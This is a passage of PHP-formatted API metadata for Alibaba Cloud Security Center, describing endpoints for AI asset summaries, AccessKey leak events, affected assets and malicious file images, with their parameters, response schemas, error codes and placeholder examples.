'regionId' => '*', 'api' => 'DeleteVulWhitelist'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'delete', 'ramAction' => [ 'action' => 'yundun-sas:DeleteVulWhitelist', 'authLevel' => 'resource', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'VulWhitelist', 'arn' => 'acs:threatdetection:{#regionId}:{#accountId}:vulwhitelist/{#VulWhitelistId}'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"9FBC6E47-7508-58C9-9E76-528E118CB1CC\\"\\n}","type":"json"}]', ], 'DescribeAIAssetSummary' => [ 'summary' => 'Queries the overview of user AI assets.', 'path' => '', 'methods' => ['get', 'post'], 'schemes' => ['https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'none', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsasGC725T'], 'tenantRelevance' => 'tenant', ], 'parameters' => [], 'responses' => [ 200 => [ 'schema' => [ 'title' => 'Schema of Response', 'description' => 'Schema of Response'."\n", 'type' => 'object', 'properties' => [ 'RequestId' => ['title' => 'Id of the request', 'description' => 'The request ID.'."\n", 'type' => 'string', 'example' => 'F8B6F758-BCD4-597A-8A2C-DA5A552C****'], 'Data' => [ 'description' => 'The returned data.'."\n", 'type' => 'object', 'properties' => [ 'TotalAssetCnt' => ['description' => 'The total number of AI assets.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '25', 'title' => ''], 'PaiInstanceCnt' => ['description' => 'The total number of cloud asset instances in Platform for AI (PAI).'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '17', 'title' => ''], 'PaiServerlessAssetCnt' => ['description' => 'The number of serverless assets in PAI.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], 'PaiContainerCnt' => ['description' => 'The number of container image assets in PAI.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '2', 'title' => ''], 'LingjunAssetCnt' => ['description' => 'The number of LINGJUN assets.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], 'EcsAssetCnt' => ['description' => 'The number of servers on which AI components are installed.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '2', 'title' => ''], 'ImageAssetCnt' => ['description' => 'The number of AI images.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '2', 'title' => ''], 'SnapshotAssetCnt' => ['description' => 'The number of AI snapshots.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '2', 'title' => ''], 'AispmRiskAssetCnt' => ['description' => 'The number of cloud assets with AI security posture management risks.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '15', 'title' => ''], 'VulRiskAssetCnt' => ['description' => 'The number of servers with AI application vulnerabilities.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '2', 'title' => ''], 'ExposedRiskAssetCnt' => ['description' => 'The number of servers that have exposed AI components.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], 'SensitiveSummary' => [ 'description' => 'The statistics on assets that have AI-related keys are stored in plaintext.'."\n", 'type' => 'object', 'properties' => [ 'TotalCnt' => ['description' => 'The total number of assets that have AI-related keys are stored in plaintext.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '9', 'title' => ''], 'EcsCnt' => ['description' => 'The number of servers that have AI-related keys are stored in plaintext detected by agentless scan.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'SnapshotCnt' => ['description' => 'The number of snapshots that have AI-related keys are stored in plaintext detected by agentless scan.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '4', 'title' => ''], 'ImageCnt' => ['description' => 'The number of images that have AI-related keys are stored in plaintext detected by agentless scan.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '3', 'title' => ''], 'ContainerImageCnt' => ['description' => 'The number of images that have AI-related keys are stored in plaintext detected by image scan.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], ], 'title' => '', 'example' => '', ], 'TotalRiskCnt' => ['description' => 'The total number of assets with AI risks.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '26', 'title' => ''], ], 'title' => '', 'example' => '', ], ], 'example' => '', ], ], ], 'staticInfo' => ['returnType' => 'synchronous'], 'title' => 'DescribeAIAssetSummary', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeAIAssetSummary'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'none', 'ramAction' => [ 'action' => 'yundun-sas:DescribeAIAssetSummary', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"F8B6F758-BCD4-597A-8A2C-DA5A552C****\\",\\n \\"Data\\": {\\n \\"TotalAssetCnt\\": 25,\\n \\"PaiInstanceCnt\\": 17,\\n \\"PaiServerlessAssetCnt\\": 0,\\n \\"PaiContainerCnt\\": 2,\\n \\"LingjunAssetCnt\\": 0,\\n \\"EcsAssetCnt\\": 2,\\n \\"ImageAssetCnt\\": 2,\\n \\"SnapshotAssetCnt\\": 2,\\n \\"AispmRiskAssetCnt\\": 15,\\n \\"VulRiskAssetCnt\\": 2,\\n \\"ExposedRiskAssetCnt\\": 0,\\n \\"SensitiveSummary\\": {\\n \\"TotalCnt\\": 9,\\n \\"EcsCnt\\": 1,\\n \\"SnapshotCnt\\": 4,\\n \\"ImageCnt\\": 3,\\n \\"ContainerImageCnt\\": 1\\n },\\n \\"TotalRiskCnt\\": 26\\n }\\n}","type":"json"}]', ], 'DescribeAccessKeyLeakDetail' => [ 'summary' => 'Queries the details of an AccessKey pair leak event.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => [ 'operationType' => 'get', 'abilityTreeCode' => '91978', 'abilityTreeNodes' => ['FEATUREsasVQUB1H'], ], 'parameters' => [ [ 'name' => 'Id', 'in' => 'query', 'schema' => ['description' => 'The ID of the AccessKey pair leak event to query.'."\n" ."\n" .'> Call the [DescribeAccesskeyLeakList](~~DescribeAccesskeyLeakList~~) operation to obtain this parameter.', 'type' => 'integer', 'format' => 'int64', 'required' => true, 'example' => '389357', 'title' => ''], ], [ 'name' => 'ResourceDirectoryAccountId', 'in' => 'query', 'schema' => ['description' => 'The ID of the member account in the resource directory (Alibaba Cloud account).'."\n" .'> Call the [DescribeMonitorAccounts](~~DescribeMonitorAccounts~~) operation to obtain this parameter.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '127608589417****', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'Type' => ['description' => 'The type of the leaked information. The value is fixed as **AccessKey**.', 'type' => 'string', 'example' => 'AccessKey', 'title' => ''], 'GithubUserPicUrl' => ['description' => 'The profile picture URL of the GitHub user.', 'type' => 'string', 'example' => 'https://avatars.githubusercontent.com/u/26296896?s=48&v=****', 'title' => ''], 'GithubUser' => ['description' => 'The GitHub username.', 'type' => 'string', 'example' => 'Blue00Blue', 'title' => ''], 'GithubRepoName' => ['description' => 'The GitHub repository name.', 'type' => 'string', 'example' => 'ExamOnline', 'title' => ''], 'GithubFileType' => ['description' => 'The GitHub file type. Valid values:'."\n" ."\n" .'- Python'."\n" .'- XML'."\n" .'- GO'."\n" .'- Javascript'."\n" .'- INI'."\n" .'- JSON'."\n" .'- C++.', 'type' => 'string', 'example' => 'Python', 'title' => ''], 'Remark' => ['description' => 'The remarks of the AccessKey pair leak event.', 'type' => 'string', 'example' => '12', 'title' => ''], 'GithubFileUpdateTime' => ['description' => 'The time when the GitHub file was last updated.', 'type' => 'string', 'example' => '2021-07-06T09:49:33', 'title' => ''], 'WhitelistStatus' => ['description' => 'Indicates whether the AccessKey pair leak event is added to the whitelist. Valid values:'."\n" ."\n" .'- **no**: not added to the whitelist'."\n" .'- **yes**: added to the whitelist.', 'type' => 'string', 'example' => 'no', 'title' => ''], 'GithubFileName' => ['description' => 'The GitHub file name.', 'type' => 'string', 'example' => 'testAkLeak', 'title' => ''], 'Source' => ['description' => 'The intelligence source of the AccessKey pair leak event.', 'type' => 'string', 'example' => 'GitHub', 'title' => ''], 'GmtModified' => ['description' => 'The most recent time when the leak event was detected.', 'type' => 'string', 'example' => '2021-07-06 17:49:39', 'title' => ''], 'Asset' => ['description' => 'The platform where the asset resides. The value is fixed as **Cloud Platform**.', 'type' => 'string', 'example' => '云平台', 'title' => ''], 'DealTime' => ['description' => 'The time when the AccessKey pair leak event was handled.', 'type' => 'string', 'example' => '2022-01-17 15:47:08', 'title' => ''], 'RequestId' => ['description' => 'The request ID. It is a unique identifier generated by Alibaba Cloud for the request and can be used for troubleshooting.', 'type' => 'string', 'example' => '79CFF74D-E967-5407-8A78-EE03B925FDAA', 'title' => ''], 'AccesskeyId' => ['description' => 'The leaked AccessKey ID.', 'type' => 'string', 'example' => 'yourAccessKeyID', 'title' => ''], 'GithubFileUrl' => ['description' => 'The URL of the GitHub file.', 'type' => 'string', 'example' => 'https://github.com/Blue00Blue/ExamOnline/blob/6c932c10fc3f217783f3937e2b230f79656c18a7/testAk****', 'title' => ''], 'DealType' => ['description' => 'The method used to handle the AccessKey pair leak event. Valid values:'."\n" ."\n" .'- **manual**: manually deleted'."\n" .'- **disable**: manually disabled'."\n" .'- **add-whitelist**: added to the whitelist'."\n" .'- **pending**: not handled.', 'type' => 'string', 'example' => 'add-whitelist', 'title' => ''], 'Code' => ['description' => 'The leaked code snippet.', 'type' => 'string', 'example' => '\\n1231 \\nak=yourAccessKeyID \\n12311123 \\nsk1999 \\nsk1999sk1999 \\nsk1999sk1999 \\n\\n\\ntest001 ak hht \\nak=yourAccessKeyID \\nsk=yourAccessKeySecret', 'title' => ''], 'GmtCreate' => ['description' => 'The time when the AccessKey pair leak event was first detected.', 'type' => 'string', 'example' => '2021-07-06 17:49:41', 'title' => ''], 'GithubRepoUrl' => ['description' => 'The URL of the GitHub repository.', 'type' => 'string', 'example' => 'https://github.com/Blue00Blue/ExamOn****', 'title' => ''], 'TokenValid' => ['description' => 'The validity of the key associated with the AccessKey pair. Valid values:'."\n" ."\n" .'- **0**: to be confirmed'."\n" .'- **1**: valid'."\n" .'- **2**: invalid.', 'type' => 'integer', 'format' => 'int32', 'example' => '2', 'title' => ''], 'WhitelistTime' => ['description' => 'The time when the AccessKey pair was added to the whitelist. Unit: milliseconds.', 'type' => 'integer', 'format' => 'int64', 'example' => '1689172004478', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'RdCheckNoPermission', 'errorMessage' => 'Resource directory account verification has no permission.', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'RdCheckInnerError', 'errorMessage' => 'Resource directory account service internal error.', 'description' => ''], ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query accessKey pair leak event details', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeAccessKeyLeakDetail'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeAccessKeyLeakDetail', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"Type\\": \\"AccessKey\\",\\n \\"GithubUserPicUrl\\": \\"https://avatars.githubusercontent.com/u/26296896?s=48&v=****\\",\\n \\"GithubUser\\": \\"Blue00Blue\\",\\n \\"GithubRepoName\\": \\"ExamOnline\\",\\n \\"GithubFileType\\": \\"Python\\",\\n \\"Remark\\": \\"12\\",\\n \\"GithubFileUpdateTime\\": \\"2021-07-06T09:49:33\\",\\n \\"WhitelistStatus\\": \\"no\\",\\n \\"GithubFileName\\": \\"testAkLeak\\",\\n \\"Source\\": \\"GitHub\\",\\n \\"GmtModified\\": \\"2021-07-06 17:49:39\\",\\n \\"Asset\\": \\"云平台\\",\\n \\"DealTime\\": \\"2022-01-17 15:47:08\\",\\n \\"RequestId\\": \\"79CFF74D-E967-5407-8A78-EE03B925FDAA\\",\\n \\"AccesskeyId\\": \\"yourAccessKeyID\\",\\n \\"GithubFileUrl\\": \\"https://github.com/Blue00Blue/ExamOnline/blob/6c932c10fc3f217783f3937e2b230f79656c18a7/testAk****\\",\\n \\"DealType\\": \\"add-whitelist\\",\\n \\"Code\\": \\"\\\\\\\\n1231 \\\\\\\\nak=yourAccessKeyID \\\\\\\\n12311123 \\\\\\\\nsk1999 \\\\\\\\nsk1999sk1999 \\\\\\\\nsk1999sk1999 \\\\\\\\n\\\\\\\\n\\\\\\\\ntest001 ak hht \\\\\\\\nak=yourAccessKeyID \\\\\\\\nsk=yourAccessKeySecret\\",\\n \\"GmtCreate\\": \\"2021-07-06 17:49:41\\",\\n \\"GithubRepoUrl\\": \\"https://github.com/Blue00Blue/ExamOn****\\",\\n \\"TokenValid\\": 2,\\n \\"WhitelistTime\\": 1689172004478\\n}","type":"json"}]', ], 'DescribeAccesskeyLeakList' => [ 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => [ 'operationType' => 'get', 'abilityTreeCode' => '91979', 'abilityTreeNodes' => ['FEATUREsasVQUB1H'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'Status', 'in' => 'query', 'schema' => ['description' => 'The processing status of the leaked AccessKey information that you want to query. Valid values:'."\n" .'- **pending**: unprocessed'."\n" .'- **dealed**: processed.', 'type' => 'string', 'required' => false, 'example' => 'pending', 'title' => ''], ], [ 'name' => 'Query', 'in' => 'query', 'schema' => ['description' => 'The AccessKey ID that you want to query. Only exact match is supported.', 'type' => 'string', 'required' => false, 'example' => 'yourAccessKeyID', 'title' => ''], ], [ 'name' => 'StartTs', 'in' => 'query', 'schema' => ['description' => 'The discovery time of the leaked information that you want to query. All AccessKey leak information discovered after this point in time is returned. This parameter is a UNIX timestamp. Unit: milliseconds.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '1614155361489', 'title' => ''], ], [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'The maximum number of entries per page for a paged query. The maximum value of PageSize is 100. The default number of entries per page is 20. If the PageSize parameter is left empty, 20 entries are returned by default.'."\n" .'> Do not leave PageSize empty.', 'type' => 'integer', 'format' => 'int32', 'required' => true, 'example' => '20', 'title' => ''], ], [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['description' => 'The page number of the current page in a paged query. Default value: **1**.', 'type' => 'integer', 'format' => 'int32', 'required' => true, 'example' => '1', 'title' => ''], ], [ 'name' => 'ResourceDirectoryAccountId', 'in' => 'query', 'schema' => ['description' => 'The ID of the member account in the resource directory (Alibaba Cloud account).'."\n" .'> You can invoke the [DescribeMonitorAccounts](~~DescribeMonitorAccounts~~) operation to obtain this parameter.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '1232428423234****', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'CurrentPage' => ['description' => 'The page number of the current page in a paged query.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'RequestId' => ['description' => 'The unique ID generated by Alibaba Cloud for the request.', 'type' => 'string', 'example' => 'B37C9052-A73E-4707-A024-9247702852BE', 'title' => ''], 'GmtLast' => ['description' => 'This parameter is deprecated and can be ignored.', 'type' => 'integer', 'format' => 'int64', 'example' => '1612357897000', 'title' => ''], 'AkLeakCount' => ['description' => 'The number of unprocessed AccessKey leak entries.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'PageSize' => ['description' => 'The maximum number of entries per page in a paged query.', 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], 'TotalCount' => ['description' => 'The total number of AccessKey leak entries returned.', 'type' => 'integer', 'format' => 'int32', 'example' => '2', 'title' => ''], 'AccessKeyLeakList' => [ 'description' => 'The list of detailed information about leaked AccessKey pairs.', 'type' => 'array', 'items' => [ 'type' => 'object', 'properties' => [ 'DealTime' => ['description' => 'The time when the AccessKey leak information was processed.', 'type' => 'string', 'example' => '2020-12-03 21:23:38', 'title' => ''], 'Status' => ['description' => 'The processing status of the leaked AccessKey information. Valid values:'."\n" .'- **pending**: unprocessed'."\n" .'- **dealed**: processed.', 'type' => 'string', 'example' => 'pending', 'title' => ''], 'Type' => ['description' => 'The type of the leak information. The value is fixed as **AccessKey**.', 'type' => 'string', 'example' => 'AccessKey', 'title' => ''], 'UserType' => ['description' => 'The type of the account to which the leaked AccessKey pair belongs. Valid values:'."\n" .'- **master**: Alibaba Cloud account'."\n" .'- **ram**: Resource Access Management (RAM) user.', 'type' => 'string', 'example' => 'master', 'title' => ''], 'AccesskeyId' => ['description' => 'The leaked AccessKey ID.', 'type' => 'string', 'example' => 'yourAccessKeyID', 'title' => ''], 'AliUserName' => ['description' => 'The name of the affected Alibaba Cloud account.', 'type' => 'string', 'example' => 'testAccountName', 'title' => ''], 'DealType' => ['description' => 'The method used to handle the AccessKey leak information. Valid values:'."\n" .'- **pending**: unprocessed'."\n" .'- **manual**: manually processed'."\n" .'- **disable**: disabled'."\n" .'- **add-whitelist**: added to the whitelist.', 'type' => 'string', 'example' => 'pending', 'title' => ''], 'Url' => ['description' => 'The URL of the external platform where the AccessKey leak was discovered.', 'type' => 'string', 'example' => 'https://github.com/hht312/test-ak/blob/0e466d2ecce55b4c924d773a058e5dc602d8****/1001', 'title' => ''], 'GmtModified' => ['description' => 'The time when the AccessKey leak was first discovered. This parameter is a UNIX timestamp. Unit: milliseconds.', 'type' => 'integer', 'format' => 'int64', 'example' => '1612357897000', 'title' => ''], 'Asset' => ['description' => 'The platform where the asset resides. The value is fixed as **Cloud Platform**.', 'type' => 'string', 'example' => '云平台', 'title' => ''], 'Id' => ['description' => 'The primary key ID in the database.', 'type' => 'integer', 'format' => 'int64', 'example' => '389357', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'no permission', 'description' => ''], ['errorCode' => 'RdCheckNoPermission', 'errorMessage' => 'Resource directory account verification has no permission.', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'RdCheckInnerError', 'errorMessage' => 'Resource directory account service internal error.', 'description' => ''], ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query leaked accessKey information', 'summary' => 'Queries information about leaked AccessKey pairs in your assets.', 'responseParamsDescription' => ' ', 'extraInfo' => ' ', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-aegis:DescribeAccesskeyLeakList', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"CurrentPage\\": 1,\\n \\"RequestId\\": \\"B37C9052-A73E-4707-A024-9247702852BE\\",\\n \\"GmtLast\\": 1612357897000,\\n \\"AkLeakCount\\": 1,\\n \\"PageSize\\": 20,\\n \\"TotalCount\\": 2,\\n \\"AccessKeyLeakList\\": [\\n {\\n \\"DealTime\\": \\"2020-12-03 21:23:38\\",\\n \\"Status\\": \\"pending\\",\\n \\"Type\\": \\"AccessKey\\",\\n \\"UserType\\": \\"master\\",\\n \\"AccesskeyId\\": \\"yourAccessKeyID\\",\\n \\"AliUserName\\": \\"testAccountName\\",\\n \\"DealType\\": \\"pending\\",\\n \\"Url\\": \\"https://github.com/hht312/test-ak/blob/0e466d2ecce55b4c924d773a058e5dc602d8****/1001\\",\\n \\"GmtModified\\": 1612357897000,\\n \\"Asset\\": \\"云平台\\",\\n \\"Id\\": 389357\\n }\\n ]\\n}","type":"json"}]', ], 'DescribeAffectedAssets' => [ 'summary' => 'Queries the list of affected assets from virus defense check results.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => ['operationType' => 'get'], 'parameters' => [ [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'The maximum number of entries per page in a paginated query. Default value: 20. If this parameter is left empty, 20 entries are returned.'."\n" .'>Do not leave PageSize empty.', 'type' => 'string', 'required' => false, 'example' => '10', 'title' => ''], ], [ 'name' => 'Current', 'in' => 'query', 'schema' => ['description' => 'The current page number.', 'type' => 'string', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'Levels', 'in' => 'query', 'schema' => ['description' => 'The severity level. Separate multiple values with commas (,). Valid values:'."\n" .'- serious: urgent'."\n" .'- suspicious: suspicious'."\n" .'- remind: reminder.', 'type' => 'string', 'required' => false, 'example' => 'serious,suspicious,remind', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID.', 'type' => 'string', 'example' => '7E0618A9-D5EF-4220-9471-C42XXXXXXXX', 'title' => ''], 'PageInfo' => [ 'description' => 'The pagination information.', 'type' => 'object', 'properties' => [ 'CurrentPage' => ['description' => 'The page number of the current page in a paginated query.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'PageSize' => ['description' => 'The number of entries per page.', 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], 'TotalCount' => ['description' => 'The total number of entries.', 'type' => 'integer', 'format' => 'int32', 'example' => '100', 'title' => ''], 'Count' => ['description' => 'The number of entries on the current page in a paginated query.', 'type' => 'integer', 'format' => 'int32', 'example' => '10', 'title' => ''], ], 'title' => '', 'example' => '', ], 'AssetList' => [ 'description' => 'The queried server asset information.', 'type' => 'array', 'items' => [ 'description' => 'The queried server asset information.', 'type' => 'object', 'properties' => [ 'Uuid' => ['description' => 'The unique identifier of the server.', 'type' => 'string', 'example' => '947d7514-258a-4b47-9dde-9dxxxxxxxxxx', 'title' => ''], 'InternetIp' => ['description' => 'The public IP address of the server.', 'type' => 'string', 'example' => '10.10.XX.XX', 'title' => ''], 'RiskNum' => ['description' => 'The number of virus detection risks on the server.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'InstanceName' => ['description' => 'The instance name of the server.', 'type' => 'string', 'example' => '11', 'title' => ''], 'InstanceId' => ['description' => 'The instance ID of the server.', 'type' => 'string', 'example' => '11', 'title' => ''], 'IntranetIp' => ['description' => 'The private IP address of the server.', 'type' => 'string', 'example' => '172.0.XX.XX', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query affected assets', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeAffectedAssets'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeAffectedAssets', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"7E0618A9-D5EF-4220-9471-C42XXXXXXXX\\",\\n \\"PageInfo\\": {\\n \\"CurrentPage\\": 1,\\n \\"PageSize\\": 20,\\n \\"TotalCount\\": 100,\\n \\"Count\\": 10\\n },\\n \\"AssetList\\": [\\n {\\n \\"Uuid\\": \\"947d7514-258a-4b47-9dde-9dxxxxxxxxxx\\",\\n \\"InternetIp\\": \\"10.10.XX.XX\\",\\n \\"RiskNum\\": 1,\\n \\"InstanceName\\": \\"11\\",\\n \\"InstanceId\\": \\"11\\",\\n \\"IntranetIp\\": \\"172.0.XX.XX\\"\\n }\\n ]\\n}","type":"json"}]', ], 'DescribeAffectedMaliciousFileImages' => [ 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'get', 'abilityTreeCode' => '91981', 'abilityTreeNodes' => ['FEATUREsasF0IRDR'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'MaliciousMd5', 'in' => 'query', 'schema' => ['description' => 'The MD5 hash of the malicious file.'."\n" .'> Call the [DescribeGroupedMaliciousFiles](~~DescribeGroupedMaliciousFiles~~) operation to obtain the MD5 hash of the malicious file.', 'type' => 'string', 'required' => false, 'example' => 'd836968041f7683b5459****', 'title' => ''], ], [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['description' => 'The page number of the current page when using paging. Minimum value: **1**. Default value: **1**.', 'type' => 'integer', 'format' => 'int32', 'required' => true, 'example' => '1', 'title' => ''], ], [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'The maximum number of entries per page when using paging. Default value: **20**.', 'type' => 'string', 'required' => true, 'example' => '20', 'title' => ''], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language type of the request and response. Valid values:'."\n" .'- **zh**: Chinese'."\n" .'- **en**: English.', 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], [ 'name' => 'RepoRegionId', 'in' => 'query', 'schema' => ['description' => 'The region ID of the image repository. Valid values:'."\n" .'- **cn-beijing**: China (Beijing)'."\n" .'- **cn-zhangjiakou**: China (Zhangjiakou)'."\n" .'- **cn-hangzhou**: China (Hangzhou)'."\n" .'- **cn-shanghai**: China (Shanghai)'."\n" .'- **cn-shenzhen**: China (Shenzhen)'."\n" .'- **cn-hongkong**: Hong Kong (China)'."\n" .'- **ap-southeast-1**: Singapore'."\n" .'- **ap-southeast-5**: Indonesia (Jakarta)'."\n" .'- **us-east-1**: US (Virginia)'."\n" .'- **us-west-1**: US (Silicon Valley)'."\n" .'- **eu-central-1**: Germany (Frankfurt)'."\n" .'- **eu-west-1**: UK (London).', 'type' => 'string', 'required' => false, 'example' => 'cn-hangzhou', 'title' => ''], ], [ 'name' => 'RepoInstanceId', 'in' => 'query', 'schema' => ['description' => 'The ID of the container image instance.'."\n" .'> Call the [ListRepository](~~145293~~) operation of Container Registry. You can obtain the container image instance ID from the **InstanceId** response parameter.', 'type' => 'string', 'required' => false, 'example' => 'cri-datvailb****', 'title' => ''], ], [ 'name' => 'RepoId', 'in' => 'query', 'schema' => ['description' => 'The ID of the image repository.'."\n" .'> Call the [ListRepository](~~145293~~) operation of Container Registry. You can obtain the image repository ID from the **RepoId** response parameter.', 'type' => 'string', 'required' => false, 'example' => 'crr-vridcl4****', 'title' => ''], ], [ 'name' => 'RepoName', 'in' => 'query', 'schema' => ['description' => 'The name of the image repository.'."\n" .'> Fuzzy match is supported.', 'type' => 'string', 'required' => false, 'example' => ' centos', 'title' => ''], ], [ 'name' => 'RepoNamespace', 'in' => 'query', 'schema' => ['description' => 'The namespace of the image repository.'."\n" .'> Fuzzy match is supported.', 'type' => 'string', 'required' => false, 'example' => 'hanghai-namespace', 'title' => ''], ], [ 'name' => 'ImageTag', 'in' => 'query', 'schema' => ['description' => 'The tag of the image.', 'type' => 'string', 'required' => false, 'example' => '0.2', 'title' => ''], ], [ 'name' => 'ImageDigest', 'in' => 'query', 'schema' => ['description' => 'The digest of the image.', 'type' => 'string', 'required' => false, 'example' => '6a5e103187b31a94592a47a5858617f7a179ead61df7606****', 'title' => ''], ], [ 'name' => 'ImageLayer', 'in' => 'query', 'schema' => ['description' => 'The layer of the image.', 'type' => 'string', 'required' => false, 'example' => '27213ad375b53628dd152a5ca****', 'title' => ''], ], [ 'name' => 'ClusterId', 'in' => 'query', 'schema' => ['description' => 'The ID of the container cluster to query.'."\n" .'> Call the [DescribeGroupedContainerInstances](~~DescribeGroupedContainerInstances~~) operation to obtain this parameter.', 'type' => 'string', 'required' => false, 'example' => 'c60b77fe62093480db6164a3c2fa5****', 'title' => ''], ], [ 'name' => 'ScanRange', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The collection of scan ranges.', 'type' => 'array', 'items' => ['description' => 'The scan range. Valid values:'."\n" ."\n" .'- **container**: container'."\n" .'- **image**: image.', 'type' => 'string', 'required' => false, 'example' 